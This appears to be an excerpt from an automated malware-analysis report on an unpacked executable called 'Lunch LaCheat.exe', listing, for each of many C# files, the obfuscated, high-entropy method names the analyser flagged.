Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, r70NTtMtM1uhGa8tvNh.cs - High entropy of concatenated method names: 'ba8wnj0pnM', 'dQ6wWL6GZO', 'HPBwAC7FAa', 'qqmwoRnjG3', 'TsdwE0WyU9', 'icWwjffg5Z', 'J8irNElFIn7Wn6y2175', 'U6uf2Nlg2avZgNruTKk', 'QeO9Nllj2DyE3o8HkOT', 'UMm4x9lbpKZ5oTtANUS'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, mBP0oLLioGhwXAdkrn.cs - High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'RD4vFCIKLIHllJerkY6', 'uvCP9wIYLrArEjhk36T', 'l3o5nHIJZ6Zu4y1Gyib', 'mo1tbvI2Zx5AqH6r5ZN', 'FIakaWI86otfJgW9sxD', 'cDlgDBIG7OAMCa9t6E0'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, KHdCRefmbkXs3K6gETN.cs - High entropy of concatenated method names: 'U2ttViaejt', 'eHqtIYFZSi', 'Yf8tmR0mCh', 'dKftuZJaha', 'YNotRMtWH5', 'vAiHkRW5DW67my42vGf', 'DGMhAhWcfBjt63gg8Ji', 'iFGOBvXGAF29XqhO46h', 'BQh4G0XzrsbXQeLGmKA', 'UH7Zw5Wn3n8D3mhT9rP'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, LMjjpmqliahLUcLnGsv.cs - High entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'KfdqIZ0a3759TGBu5PR', 'dc2KE40SB5kdmDO36nt', 'WukPRJ0sGktsPStdt1N', 'XWbLkl0VAVrl3ZWaPF6', 'w2H7td0KNICT7stNJ3F', 'xYLhGd0YOhdnj9i3HJK'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, fttbW4MDcJoMNSH5luT.cs - High entropy of concatenated method names: 'qJXJYpW99r', 'J2gJldmVh1', 'GHjJvt3wrp', 'bk1JN6UCD4', 'bODJiPq948', 'hGmGUUN6i8Q9mATGUco', 'k5v9pUN7Av8ih4vYORN', 'mv1KLuNB9ITBxXnAx9k', 'k15qJMNImxrfpVGCfQW', 'JcDtgkNyl5ay1YPElJX'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, DAsN0KqaOCtdgS3tEyf.cs - High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'M6bISbqElc2gBTqnY69', 'gv7VZ3qCnc1PaSvp2Ir', 'aPJVY0qp1Ytv8ghp49E', 'hGXX9LqovAi91ujCX4d', 'YmHOsCqu74Uti3CRdZN', 'SlDBkJqhuCrggQ7uDub'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, UlZg75qsQwJiM21bO65.cs - High entropy of concatenated method names: 'lHIqCRnmAO', 'vMgMF0yfJ8TikhX2JrH', 'y0HOBuymjT37Y7qUx2h', 'w22e1AyWFE8HZhM0DNL', 'ANdsv9yw6wD9muTxSB5', 'twyKcYylT8BWuQF1YcT', 'saTZbGyrug8BVIVsd20', 'P92crFyDmlOTLF4bFuE', 'LNu749yN3gnq0LspyUI', 'f28'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, B0aWXNMnlXn2BLGMp6h.cs - High entropy of concatenated method names: 'sg9', 'Ulq51Ji3mp', 'AJXZLAKlpa', 'thE5H3BDVC', 'sTtO0B3ZeCiOkoYtyRi', 'fAqy4B3a2PsP4Csb2GE', 'vtMweA3SARa1hcsJZst', 'OiSpfI3dk3Lt4obXW8F', 'AJuwmF344OoGZRVvedm', 'YawJpm3sYwIUgtktTEe'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, gI07OVUv4aW9pt78401.cs - High entropy of concatenated method names: 'wsB8tf822i', 'VUf8UA23TH', 'dQj8XeOEdi', 'LwO8w8sMco', 'sR58JxMG3p', 'kfR8ZR3xYr', 'fmk82qvu9R', 'riu8B4g1M9', 'kQk86mZJwj', 'RKe85rMYEe'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ruGDE8wHCs1LugFJYDC.cs - High entropy of concatenated method names: 'kB38y8dk5oW2xdKQBrP', 'G6ZbBJdgUO6CLx48d5K', 'dDPudsdxa6pJGbmnmKi', 'b0GZXwdH7ygfxCFOP1w', 'BkAGPB7unW', 'oZOOPmdb3qMR2OdZTra', 'N4YP0Cd1iuhaXhBVh26', 'NS4jk6dO3LJwCCJHcdh', 'cjeMFidvcwPeWVu3eAE', 'G4SHC9dLD6xHeQMsvhm'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, zjoE3wqcjVQABWnuZwJ.cs - High entropy of concatenated method names: 'LDwqLbeMqa', 'bU33lM9CY6QbqkUuSXQ', 'edxOpB9puVMW4WRBXYU', 'u2okGP9MG0fEDvWvjeu', 'kDPEj09ExKrMrEl81QS', 'dv3GOp9o4yBpxyypgav', '_3Xh', 'YZ8', '_123', 'G9C'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, nldwCqME01ywJTeITCX.cs - High entropy of concatenated method names: 'oYo', '_1Z5', 'v0e5Yer2Yh', 'gGg2tdWOIW', 'hBV53OseBt', 'cuvwY2tiF6T0xlmhlRC', 'DbBHZOtP9vQ03rGX3cr', 'zyxEwctXsbdURV0wraa', 'T257FqtW9ce8SpJEWSC', 'SFoZ3ZtwJPZTejL75Gm'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, jVQRA9qILNDR4ueVNdL.cs - High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'oktDTryxsKvOiykeSyp', 'aSXGyWyHbHVuvujaXVW', 'j9DsnTykvOXD7VqlgNy', 'VsEnKxygPhd1RbnlKLC', 'f2ttHIyjk17CiWnkXlh', 'LBdBwxyFOHpWMnIyeFy'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ykUT5HnIRnmAOVRT6X.cs - High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'eY2MbUB0PecUyh3V2wW', 'd8pkn0BAPJITW9DDqcq', 'Tv5aE7BR4L0wAL8jA7R', 'mMPINVBiepktgJ302Pr', 'M4gHVpBP6fZUQTFsMM1', 'cPKUSUBX6ioO9PN9JUd'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, zy6GHpNEirDwbeMqaG.cs - High entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'YfPN9GIe92ZZpZ9hmoH', 'ADWV0RIdwoLO8FWq0Ir', 'c0DhSCI4rJqavKqnUCf', 'wHH5RqIZVucg3SkrGbq', 'pujxo0IaN1clKxhtVbC', 'XqoEwiISvg6R27NyE7H'
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, j8yowCfSyTNdR3Qg4Jh.cs - High entropy of concatenated method names: 'z4DMLvf7yf', 'zwLMk4iAhK', 'IYjjs7PluGqUdZbLiIU', 'o2O2kGPrC5Li2fny4MT', 'onGWsrPDJhjoSEs4QKE', 'ECpQQ1PNIZyjHTTKWXl', 'skwvxXP31xojtFQeYcO', 'OUkWPoPtURsH0OCLxTV', 'SVewE2Px9vtFQksqGyF', 'jJ24xJPHrOK9SaMtxTS'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, X1FXHctVq7kE4pJRmYh.cs - High entropy of concatenated method names: 'LkY51lKamo', 'apE59apTLb', 'l185p0gr7V', 'oNr5ddQGeP', 'v1x5c60a9L', 'Uuty8tkM18wp61hrkDf', 'VeRQjGkEHw3Q8asgmVu', 'Fbw6jrkvF7gtX0xJpVa', 'lC0gFckLZ18puOV2AUc', 'AMtCArkCcB6NLMt5FHW'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, XfZ5nTqO2eBgWgje4xu.cs - High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'sTi4UqyGRJftkS1ZHnt', 'aNQkoEyzVITyOnD7t8F', 'X8PHJDq5Jo8W1Z56NsX', 'JnVY21qcxIgQ4hFRZVs', 'lyvonuqnw8f7bxLb3DN', 'vVOG7WqQl5pajghAZns'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Lt3DSvqMxZcQ5oZBmim.cs - High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'ti108i6bPMh7NNdD0Fg', 'gVVhxC61nmmPWuhSTk4', 'DQbUm86OGZcdm3KKjFo', 'KRhhys6vb76PXjs3uIn', 'gJmdVq6LVSYWZoOx71F', 'HOeuRI6MHyj8SAiueEi'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Jb85v1sq6IWCtQ7Vqu.cs - High entropy of concatenated method names: '_0023C', 'IndexOf', '_0023D', 'Insert', '_0023E', 'RemoveAt', '_0023F', 'get_Item', '_0023G', 'set_Item'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, vK3PiltUTHMLVDrDT8n.cs - High entropy of concatenated method names: 'FBr6S3mhmp', 'mvGkoXHmahBtZ5DeyAP', 's3yI1IHlnbYWQ0cDjsW', 'tubhBvHwJMxNiUtCSoD', 'f06gDqHfv0377bFQKfj', 'tXv20oib2p', 'TDc2G9dTCL', 'wwZ2bbYM8P', 'edZ214Srfu', 'q8N29cRarq'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, q8LHkBqBZc0BmxvQWYH.cs - High entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'dc2h7s7l2bZ7ac2bgs5', 'XXkXrf7r24Mh4osJaef', 'BJKaqZ7DZBiopasUQXP', 'vOvdmP7NkIm7avuOprL', 'lb9aJS73vL1Cn8CVhEV', 'O9TKQq7t156fMSeGKyv'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, VwsI0eXAjxgDO5eO946.cs - High entropy of concatenated method names: 'PJ1', 'jo3', 'QhACZG1nuJ', 'gnxC2qDR75', 'xgbCBXBdC6', 'EC9', '_74a', '_8pl', '_27D', '_524'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, z8gUbRX871YUO6KvEjH.cs - High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ix9Miew8MmrhPUW6iG7.cs - High entropy of concatenated method names: 'A7EGRZWto2', 'MlUG8wO8sA', 'zjHGhA80h0', 'k1tGOFYPLo', 'H8kGetCy2q', 'cIMGa7LTR1', 'yQLGCpAmy2', 'nkHG0qyIkQ', 'h4SGGYebre', 'lokGbybUQ7'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ctiO1aUb80GXStvVQ3f.cs - High entropy of concatenated method names: 'sFTRYKjJvv', 'YFXRl2LSuZ', 'igKRvQ9RUr', 'aKNRNk5oQf', 'KGWRiMrEoo', 'q2hRL9enh2', 'vNOWsDCZGATwrY8gMq6', 'PJwbB8CdW955LNt4iEj', 'rvCMDxC4DFbmX1a1HI4', 'CaATkkCauyj44NtKGXO'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, nhbQX4wTCE0caeKIHB.cs - High entropy of concatenated method names: 'EQXH4TCE0', 'Yi8356vripC8ilFp0f', 'SSvq0R1MYTyTJUTY0G', 'HWNHdtOUXBWVAWXdIX', 'L0xsrELxFiDu0W9bFR', 'AiWZ4IMeVAmJ4F6jb1', 'OIIfH6Xm7', 'qkJML7FH5', 'wxltexwLw', 'mafUaGdQV'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Yarf2vfPQwRKas0dOld.cs - High entropy of concatenated method names: 'YcBMNnVE0A', 'bFKFfAPQdJqDSLdxsRN', 'Ui04YvPBQas2ifmOoHO', 'FOsO4HPc1PT3R8IgsnS', 'VKZ4elPnV1yPfUV0Mae', 'sBfOimPIjyexNZHuxP8', 'LsGyCqP6Y0Sw1YbN2SJ', 'Ga87hZP7Iypv8oK2YEZ', 'j6PrYqPyXHrUnWoAJsd', 'mwpOhCPqk5ZNWH9xbCN'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, RSx3mxln0wS0orPm0E.cs - High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'l2h1jXIjN1EHXRcdH8S', 'o2Ni80IFl7jUaGDcfSK', 'AVxZQ1IbsIs8ixlkEH7', 'rvguNmI1uOZvsnpN8hn', 'yiOQn9IOE4VjSvBjfxx', 'TZRaJjIvBLBitp2ap4b'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Au6u9NXX2BPw1dlx1cN.cs - High entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Thw6BMqwvwHF16riBkP.cs - High entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'DXXyLe6YjtAoUAlR400', 'IsQInp6JBBf6Bax69i9', 'RrgwEw62ZWLWR5FdqKm', 'nJmgoR68sn0tOY8nH2p', 'YDje1g6GePELr76Akld', 'UkWNYr6z9qJd2t0UiHX'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, OKOFf3AyEOTeQ8sF02.cs - High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'HHARG2BfYWdYMpdL3vl', 'yqnvCRBmK9is93gbZw5', 'RAdw8XBlerWmPNMHejV', 'tBcVD7BrGUwGmKKlW1U', 'V53aXFBDCHnwZbTRin8', 'fjI1qBBN3EMlGrTwMVj'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, iWMFUTm5Qgip1Z9i3E.cs - High entropy of concatenated method names: 'f1HRteHcI', 'KLh84nVgP', 'wkfh2Pa3I', 'Tp5OiNLJJ', 'tybeBsmlv', 'FegawM7Yt', 'Ku0CqOYbu', 'PKpGNPcyg7aCyWqRSYn', 'pV5Pahcqqo1MKYaLtGX', 'RpdF43c9ENdB4rxPv91'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, suwuZqqUaCC4bv2jsNt.cs - High entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'sAHwBF6dCOL3BN4shTu', 'dLDqJK64nHlexilVgsx', 'yJLm8S6Za6VXOQa402f', 'aIAlpp6ade7u8qbGyOX', 'PSKl916S7BgsIc6XHEM', 'KOA13J6sJdCf3N482rU'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, bUKS09MsXqrMAhvIgjN.cs - High entropy of concatenated method names: 'LVkZ7ydJL1', 'RXHZgcq7kE', 'spJZSRmYhS', 'nYPaFINUATgOmD2wdj3', 'avDaptNhqOKZG3eGdIL', 'OR93XGNT6Xj1A8YDkQk', 'KmXl6UNecbQwCXrqvXN', 'yJ6ZXvuweT', 'CvGZw7UVGr', 'JyaZJQgawe'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, r1Nd7VMgjpfgH8UhQxo.cs - High entropy of concatenated method names: 'CQFJxOA333', 'GPlJFtAkWb', 'twOJQmTxvP', 'zFOKUnDdD04qbhNC0yh', 'WHPR53D4h4jXhm4myGP', 'RDpdGxDZmn1Zwm7je4L', 'AtyTDdDavXYI4CjUynr', 'rsElwBDSV37y8BAOoeX', 'nYNKVTDsrCsQdvXY4Ar', 'MwpeOGDVh3NZsXZT7X7'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Fioc1Eq5kI2Wt8Yw2K3.cs - High entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'pe8Y567gq5BdfHvRsHG', 'fycxlI7jSB8cgfDGNOp', 'jCO1mL7FZccHMJ3VyCm', 'kIkAFj7bdSYdMSAh8Np', 'kar2iO71X55aoCpyS4x', 'enfFTM7OVdnv3amTJ84'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, dVUBQucrV6vLHbsrlB.cs - High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'Sx2g3IQEkNSyapVAdBm', 'ptGwXiQCWH9aZxJjeOS', 'R6XEt4Qpghm4myNgS0A', 'EnaSu1Qo508gWs5LXdV', 'oZdGeGQuOnEbNesrKRw', 'nDI3xxQhPTyyaEyjr35'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, bWvKHFeX1fCoZwKOW0.cs - High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'D4idk5n0rHxOIMbXBpD', 'j99aY5nAJp7JVUikfi0', 'kjbyW8nROFsLNZpHQJ6', 'jTMKvkniuyvkpf3VChZ', 'YZHjornPXX4SAkLd81W', 'slmX5gnXcGpNtg8Lc7I'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, gKJnY3fffZyAJh7UTXY.cs - High entropy of concatenated method names: 'RUNfjSb3Gb', 'qYlfxlZg75', 'SwJfFiM21b', 'z65fQeKRl3', 'jvXfYxaNYC', 'NTOflNCx0T', 'JFajgeRfh54h82epLwk', 'IXH5CyRmGleZOV1rM2I', 'Q73ZJmRWIuIR6u6KGDB', 'Od9WKuRwpETgG1aBejd'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, v1H9NwqEOJDUB1tm5YX.cs - High entropy of concatenated method names: 'NKxfBJ9gEb', 'z1Tf6PI5PK', 'WyaLBQ0AmR8piRUljVY', 'xAvxBW09gEq0CG7AUy3', 'JgGt2K00mDjaXfxpECQ', 'CYkRpL0RaLhodWbkQKH', 'HnjsTg0i36s9WZlKYfM', 'L03M900P13ChX4MvafH', 'TIpof00XSGngI1vTvvj', 'SF0ZoB0WgDTwMsMjVcH'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Fnr6ywMQNBPcTXUFQeh.cs - High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'IT02B0NaA8', 'Qjt5q4hF13', 'Cyo2606ER3', 'vko5IrU3jc', 'sDiMNXtp85QCCZP79fg', 'rsYW6lto7dgftD01ift', 'r0Su44tE2uY5h1WWjtd'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, wqRwrbX1J1I0lijql3J.cs - High entropy of concatenated method names: 'qyJ5TjUBrcELHDypRVR', 'okjImSUIpVSNypJkCGa', 'LULUEqUnkXXGocgk3ky', 'mRBREgUQCPKKyohB9iq', 'qjpO9d8jf1', 'WM4', '_499', 'lYROp9AR7q', 'xQjOdZft1Z', 'TfaOc8KN6Z'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, SnxHSTqDkQ0SnKZtlax.cs - High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 's6IhVny5iCelJ8n2iZ5', 'bMhYt5yciBLIP5L6eew', 'CX02B3ynMkPf0nmVUtp', 'oMPJH7yQv8t8cvAnt4I', 'NXqCtlyB1LE0DFyDUv4', 'EsokVRyI9Xb9FF5MMqS'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, zmTxvPtB3JXpW99rT2g.cs - High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, nKFhZaGINSnlIuOGr6.cs - High entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'oU4K1Tb85', 'Dj5REmnlY70lckCAcCY', 'qqChvVnrHb4tv0pesFG', 'hJsE6fnDqDqZAxYKs03', 'eCPPmMnNVMOi2NJ8FYU', 'lIaM53n3hgmj0mlweVl'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, MZcSW5XFnMZt2tTbkg5.cs - High entropy of concatenated method names: 'Aj5CmemkBa', '_1kO', '_9v4', '_294', 'qpbCu8eZ1t', 'euj', 'MOiCRpBV8q', 'AeaC8rGIAN', 'o87', 'lb1Cho7prW'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, WWqZNXK75NEoPq9OON.cs - High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'QNjyldQJYfb7F6L0bLM', 'ssMcBqQ2AgGWB1IgPnB', 'o2aqMYQ8P280noQTDmF', 'GSCGFYQGOiA1roIXyaY', 'PI3mSKQz1S28VLSo76D', 'dKVWDhB5Pf6DTg4wcVp'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, mVPDZufZM2W7mkK879j.cs - High entropy of concatenated method names: 'J2UMbVjRB6', 'wLOM18f94l', 'bRDM9RQIua', 'FCCMpiX6Rh', 'zCuMdgCvtb', 'VVjMcclkjW', 'cmGMTsVGNs', 'WvRvtyixcFHmYmeLPBl', 'vecaksi3AcyP4Q2SSkc', 'B21HkIitdPNVhIQbKia'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, jnVE0AqQ75AvvmYSO4D.cs - High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'NEOdEQ0O8F4GBDd9q3v', 'ANwRux0vVtbqoP3mbIo', 'bf7KUY0LWWhMWRwFqNq', 'dTeDGm0MtXA15BKAT4q', 'MBV3610Ee14N1BUI0C4', 'IauNtu0CQvuFhNmEbxV'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, GXbGVUq9ec7tQ7QY4FA.cs - High entropy of concatenated method names: 'CorqlPm0EZ', 'dbCT6b9xt4SIjwGcTpo', 'Cc23qw9Hqw51fELBEUP', 'YqP1vO93KQCXtLglce7', 'qKypAP9tH44l4i9GFWP', 'Ut14gR9kUUP4DYoGUC0', 'QLw', 'YZ8', 'cC5', 'G9C'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, S4xuYYf4VvkDUfoJrma.cs - High entropy of concatenated method names: 'KmItHy8RCX', 'hfvtP2Yevb', 'fKgfm6XxBJm57GNKGjt', 'gkZKx3XHYrOWnbe0sTQ', 'vhEvxIX37eiiOpQw5vM', 'cdE2eEXtTCVwNauLgZc', 'JCtPOqXku8GaQnNosNH', 'erP1AoXgwSSZCm0IOnB', 'S1qVpaXj6TCm7j3DOi9', 'oFfOsFXFEYwfmI07iEk'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, spviIXXITu8HiQLRydd.cs - High entropy of concatenated method names: 'K20h4TKijO', 'P5uhVdQO1L', 'pn4hIRSyqM', 'ERehmlw0LM', 'wtphusGQWs', 'cLQyeou26FrYqdVs4PA', 'kwTChXu8ZTKPtB0WkkT', 'zkRfCquGBv3XTY00Tcp', 'yqmxEJuznAIeCmuCpIQ', 'jVq0sjh5xhViu2lD1ig'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, bjx4PUMNvrbRTipVjsL.cs - High entropy of concatenated method names: 'bSGuPSxCqQx8COVogUR', 'IZdvcXxpbntIBs2jPE1', 'wde6TExMAm1KLhlWrIY', 'IqpQkRxEW58S5H1aEn6', 'IWF', 'j72', 'hdI2ScsE9M', 'FTh2DLjhNr', 'j4z', 'APh23kPe0K'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, DNSXGhMxb8hbaZ3ZyOl.cs - High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'bHN5MRYiSF', '_168', 'YE1x18tHjJndhXtjI9G', 'Es2Tc8tk1D98Hs9mLfo', 'mjdPxOtgNK89UKGrREt', 'MqejK6tjvtqcoqfFc80', 'rUdYc2tFBN5Bu275YvO'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, mGRo5IqgkpbCevtLJw4.cs - High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'HlnkvJ7VPsCs6ZsASYh', 'YaUZWc7KWWp7fikmkBL', 'mFT2oW7Y3Kmq8Aaa870', 'T044587JtvcIy7SB7hw', 'PEtD9772RffA43EytyE', 'nCuIXI781myahKHrcWj'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, n5BLl0zub6q1E6cKtB.cs - High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'Tr9Fr96QgZuIYdCN7KJ', 'h0hgxw6BnAWv6j2DTTg', 'hrl1Np6I3KlBF7Fw5PU', 'CxNYl1662OsmSNJRpj2', 'KwCnSn67Df9xTZgkGCj', 'bhXF276yG03fALrguhy'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, d1Ms4CUYfOkEyT4rV8O.cs - High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, zyKIFSUOvZVd5nfJLNC.cs - High entropy of concatenated method names: 'qmhRTovydL', 'MDgRKRD95d', 'oPLRrjc0QR', 'I4ZRnSZmWU', 'EflRWEh8pQ', 'BShREYCj3FSd17ynq3w', 'M1aqNuCkx4yqBE7nkZQ', 'XhX3gfCgCHt5HO7OYOE', 'wlZqSiCFub9p6BpSV8G', 'kk00a4CbebRhf5yS9E1'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, wiSwb7XyiTFNRrZRITR.cs - High entropy of concatenated method names: 'P7f8owehxD', 'oer8EZtJhj', 'UaU8jJEEsk', 'b3M8xOxYte', 'XYR8FBIV12', 'CCe8Qhns0d', '_838', 'vVb', 'g24', '_9oL'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, LyW9xXtR93TyJkM7URN.cs - High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'wqRHywrbJ1', '_3il', 'u0lHqijql3', 'gNKHfvtbRv', '_78N', 'z3K'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, JLb518Xu0gr7VgNrdQG.cs - High entropy of concatenated method names: 'IGD', 'CV5', 'yo0hR4v39K', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, zWT2AgqN8s5bxJgQo4x.cs - High entropy of concatenated method names: 'LU4fsRYhw6', 'koYq7XA6VkFOldRJlt5', 'ccRkdYA7c8aLwhFmU7A', 's94O9bABd6YMGKmZJR3', 'spfTZbAIiNkRdF5jqg4', 'kwVPm9AysBEtBOyjXnq', '_5q7', 'YZ8', '_6kf', 'G9C'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Sb38j9M5TwPKU5E3N8P.cs - High entropy of concatenated method names: '_223', 'ObchL9DfKqx2y8KPI5B', 'zjyL8gDmB4BA5tX7Sfy', 'AwD8o0Dl8nau0GJDmZc', 'KcrNg3DrrGXhKKACSCj', 'doGS2gDDLcw7qKJHgUc', 'BGYtIMDNCUM0F2OihNl', 'KNcso5D3h3X9yXtwoPg', 'EWsr58DtvoPG6EmKuHn', 'hUx1kPDxpqXCnZMBpOj'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, hYxb1wtLnXrN0rRtimV.cs - High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, I9vhRHquCQ0uLDtMftj.cs - High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'm6JOx8yMVT2AMFy8MY0', 'iN5JtyyE8TQ2EHIq3IW', 'abuNRQyCZQ2s77Z74kO', 'UocsYxypvl32uvLQbW3', 'nU3W9ryo2MCKBXibePA', 'Pj5imPyuBcytTng08QB'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ckfw2rtlq8EL44wGQV0.cs - High entropy of concatenated method names: 'rsKPLncwwW', 'L6sP9D7GLP', 'MY3PpHxxvt', 'DxqPdKmpmu', 'BmxPcxeGN8', 'KNWPTCeMTY', 'UR2PKMeayj', 'EiKPrlj1Li', 'yVFPnZuxop', 'BO6PW9RhMe'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, diijDZfkEAwvm72umcW.cs - High entropy of concatenated method names: 'CsNw8U53TQ', 'lJPbMhmS8Ct7f7ZO0ZG', 'yD6n0FmZlZeDciG0APA', 'OeK0bpmaqdd0OZNZgDw', 'oVKeupms4HPDKNBNLGA', 'Sbvr4MmVIw5cXP5kZdL', 'mmFw3GkEYg', 'sEAwshq5Hq', 'Db9w47p6oR', 'waSwV8Ztq9'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, w22xDBMq7bbo3Ga2veg.cs - High entropy of concatenated method names: 'a1vwCr4fti', 'H9mw0we9aC', 'H0awGgssIu', 'yMIwbRkDE9', 'WYHFxumzDsJZ9jDMjSS', 'jEYH21m8eJJ0NNVD1em', 'Yvp70SmGvJRg5At98tT', 'wyuwNBl5bUYGD9NeyHR', 'DttIPmlcBQFUZdNx5p9', 'U98xMblnDjicSGj2F1B'
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, whZPVLpQKsuh7sYp2i.cs - High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'usrtRen8XF05jgBeSKi', 'iA6vWdnGYWrQkMlHeC4', 'l7OCiwnzMUcQmb87Osk', 'nC8VUBQ5xMr7HXTLLeK', 'uhMiPYQcaVJ4N9J6BUD', 'xMoQmfQnNypsK1NrACC'
